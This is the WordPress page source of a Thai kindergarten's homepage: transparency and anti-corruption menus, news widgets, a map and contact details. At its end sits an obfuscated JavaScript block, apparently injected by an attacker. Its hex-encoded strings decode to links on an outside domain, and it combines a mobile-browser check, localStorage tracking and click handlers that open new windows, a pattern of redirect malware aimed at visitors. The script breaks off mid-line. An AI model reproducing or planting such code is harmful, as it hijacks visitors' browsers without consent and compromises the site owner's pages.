style=\"font-size:15px\"><table><tbody><tr><td><strong>รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</strong></td></tr><tr><td><strong>ประกาศต่างๆ เกี่ยวกับการจัดซื้อจัดจ้างหรือจัดหาพัสดุ</strong></td></tr><tr><td><strong>ความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</strong></td></tr><tr><td><strong>รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุประจำปี</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8283a353\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8283a353 gb-button-text\"><strong>การบริหารและพัฒนาทรัพยากรบุคคล</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนการบริหารและพัฒนาทรัพยากรบุคคล</strong></td></tr><tr><td><strong>รายงานการบริหารและพัฒนาทรัพยากรบุคคลประจำปี</strong></td></tr><tr><td><strong>ประมวลจริยธรรมสำหรับเจ้าหน้าที่ของรัฐ</strong></td></tr><tr><td><strong>การขับเคลื่อนจริยธรรม</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8e160f87\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8e160f87 gb-button-text\"><strong>การส่งเสริมความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</strong></td></tr><tr><td><strong>ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</strong></td></tr><tr><td><strong>ข้อมูลเชิงสถิติเรื่องร้องเรียนการทุจริตและปรพฤติมิชอบ</strong></td></tr><tr><td><strong>การเปิดโอกาสให้เกิดการมีส่วนร่วม</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"dd227e0e\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-dd227e0e gb-button-text\"><strong>การดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>ประกาศเจตนารมณ์นโยบาย No Gift Policy จากการปฏิบัติหน้าที่</strong></td></tr><tr><td><strong>การสร้างวัฒนธรรม&nbsp; No Gift Policy</strong></td></tr><tr><td><strong>รายงานผลตามนโยบาย No Gift Policy</strong></td></tr><tr><td><strong>รายงานการรับทรัพย์สินบนหรือประโยชน์อื่นใดโดยธรรมจรรยา</strong></td></tr><tr><td><strong>การประเมินความเสี่ยงการทุจริตในประเด็นที่เกี่ยวข้องกับสินบน</strong></td></tr><tr><td><strong>รายงานผลการดำเนินการเพื่อจัดการความเสี่ยงและประพฤติมิชอบประจำปี</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"85986834\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-85986834 gb-button-text\"><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนการปฏิบัติการป้องกันการทุจริต</strong></td></tr><tr><td><strong>รายงานการดำเนินการป้องกันการทุจริตประจำปี</strong></td></tr><tr><td><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</strong></td></tr><tr><td><strong>รายงานผลการดำเนินการเพื่อส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</strong></td></tr></tbody></table></figure>\n<!-- /wp:table --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"76fbe2ef\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"19_d11eed-26\",\"columns\":[1,1,1,1,1,1],\"ids\":[81,82,83,84],\"linkTo\":\"custom\",\"showCaption\":true,\"captionStyle\":\"cover-hover\",\"gutter\":[10,\"\",10],\"displayShadow\":true,\"imagesDynamic\":[{\"id\":81,\"link\":\"https://nsschool.ac.th/home/%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"width\":750,\"height\":259},{\"id\":82,\"link\":\"https://nsschool.ac.th/home/%e0%b8%8a%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%97%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%88%e0%b9%89%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"width\":750,\"height\":259},{\"id\":83,\"link\":\"https://nsschool.ac.th/home/%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%97%e0%b8%b8%e0%b8%88%e0%b8%a3%e0%b8%b4%e0%b8%95%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%9e%e0%b8%a4%e0%b8%95%e0%b8%b4/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"width\":750,\"height\":259},{\"id\":84,\"link\":\"https://nsschool.ac.th/home/%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%84%e0%b8%b4%e0%b8%94%e0%b9%80%e0%b8%ab%e0%b9%87%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"width\":750,\"height\":259}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"07462550\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:contentviews/grid1 {\"blockId\":\"7dr8k85x\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":250,\"xs\":100},\"thumbnailHeightUnits\":{\"xs\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวกิจกรรมโรงเรียน\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"ข่าวกิจกรรมโรงเรียน\",\"value\":\"news\"}],\"meta-fieldsfSize\":{\"md\":11},\"headingBgColor\":\"#00000000\",\"headingWeight\":\"600\",\"headingfSize\":{\"md\":24},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"taxotermfSize\":{\"md\":11},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"8rsrezsy\",\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":45},\"thumbnailHeight\":{\"md\":260},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"4\",\"headingText\":\"ผลงานนักเรียน/ครู\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ผลงานนักเรียน/ครู\",\"value\":\"%e0%b8%9c%e0%b8%a5%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99-%e0%b8%84%e0%b8%a3%e0%b8%b9\"}],\"content-itemBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"meta-fieldsMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"headingColor\":\"#ffffff\",\"headingBgColor\":\"#cf2e2e\",\"headingWeight\":\"500\",\"headingBorderColor\":\"#f78da7\",\"headingfSize\":{\"md\":20},\"thumbnailAllPadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"readmoreColor\":\"#000000\",\"readmoreBgColor\":\"#eee9da\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"q4ud2298\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":3,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_bottom_right\",\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"\\u0026#8210;\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":300},\"thumbnailHeightUnits\":{\"md\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"3\",\"headingText\":\"จดหมายข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"จดหมายประชาสัมพันธ์\",\"value\":\"%e0%b8%88%e0%b8%94%e0%b8%ab%e0%b8%a1%e0%b8%b2%e0%b8%a2%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c\"}],\"headingWeight\":\"600\",\"headingfSize\":{\"md\":24},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e68763c\",\"bgImage\":{\"id\":155,\"image\":{\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/rovbb.png\",\"height\":700,\"width\":2000,\"orientation\":\"landscape\"}},\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"a8863e18\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"73d9ffe7\",\"columns\":2,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"4cd8c7be\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:html -->\n<iframe src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d1925.9723083104054!2d104.32273680156584!3d15.106380799999997!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x3116e380deaa317f%3A0x4d9751ab2c19279f!2z4LmC4Lij4LiH4LmA4Lij4Li14Lii4LiZ4Lit4LiZ4Li44Lia4Liy4Lil4Lin4Lix4LiU4Lie4Lij4Liw4LmC4LiVICjguJ3guYjguLLguKLguKHguLHguJjguKLguKEp!5e0!3m2!1sth!2sth!4v1722088475215!5m2!1sth!2sth\" width=\"100%\" height=\"350\" style=\"border:0;\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"457aa97e\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingTop\":\"30px\",\"paddingRight\":\"30px\",\"paddingBottom\":\"0px\",\"paddingLeft\":\"30px\",\"paddingTopMobile\":\"40px\",\"paddingRightMobile\":\"15px\",\"paddingBottomMobile\":\"30px\",\"paddingLeftMobile\":\"15px\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"b3723dea\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-b3723dea gb-headline-text\"><strong>โรงเรียนอนุบาลวัดพระโต</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"51a75706\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-51a75706 gb-headline-text\">1193 ถนนขุขันธ์ ตำบลเมืองเหนือ อำเภอเมืองศรีสะเกษ จังหวัดศรีสะเกษ 33000</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"fa4bd31f\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-fa4bd31f gb-headline-text\"><strong>ติดต่อเรา</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e820350\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e820350 gb-headline-text\">โทรศัพท์ : 0-4561-2730</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e95d8cb\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e95d8cb gb-headline-text\"><strong>ติดตามเราได้ที่</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.facebook.com/plugins/page.php?href=https%3A%2F%2Fwww.facebook.com%2Fprofile.php%3Fid%3D61556083436494&tabs=timeline&width=330&height=80&small_header=true&adapt_container_width=true&hide_cover=true&show_facepile=true&appId\" width=\"330\" height=\"80\" style=\"border:none;overflow:hidden\" scrolling=\"no\" frameborder=\"0\" allowfullscreen=\"true\" allow=\"autoplay; clipboard-write; encrypted-media; picture-in-picture; web-share\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v 